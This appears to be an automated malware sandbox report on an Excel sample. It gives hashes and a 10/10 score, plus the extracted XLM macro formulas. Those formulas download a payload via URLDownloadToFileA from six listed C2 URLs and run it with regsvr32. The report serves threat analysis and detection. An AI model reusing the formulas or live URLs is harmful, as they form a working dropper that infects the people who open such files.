General

  • Target

    77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

  • Size

    43KB

  • Sample

    240909-1rymbatgnb

  • MD5

    b51c33433677367fc5cf4698f54005d1

  • SHA1

    b1613ba78ba371eaeaecd9c29a768179eabd5afc

  • SHA256

    77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

  • SHA512

    bc8baebfcda195174e26a695dcdcccc6318171109515ef69e7434be622921f87f0b5c00ee1c30721c3515979f0156422d0733667e577e2cc572bd81ee6957588

  • SSDEEP

    768:gCgW/w0HGfdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gFHJneAWl2r49:tgWZmsb6yVwpFB1CuEge7tgnes89

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://narsanatanaokulu.com/wp-includes/WQHhwTuSM5flyMv9/

http://www.beholdpublications.com/home/GCKnZAKB3zz1qnN/

https://ramijabali.com/licenses/44KGV1/

https://winnieswondersaviary.com/wp-content/BNzK17qzh1WQm/

http://vipwatchpay.com/Isoetales/Mvlqx9YifBDaHH6e/

https://rjssjharkhand.com/wp-content/ZddKK1KEaCO6BYbS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://narsanatanaokulu.com/wp-includes/WQHhwTuSM5flyMv9/","..\xda.ocx",0,0)
    =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/GCKnZAKB3zz1qnN/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ramijabali.com/licenses/44KGV1/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/BNzK17qzh1WQm/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipwatchpay.com/Isoetales/Mvlqx9YifBDaHH6e/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/ZddKK1KEaCO6BYbS/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F22<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx")
    =RETURN()

Targets

    • Target

      77d363f8f5c537caeee3c45484a2dad56cae0e12322307057c5ffbdeaa91f49c

    Score
    3/10
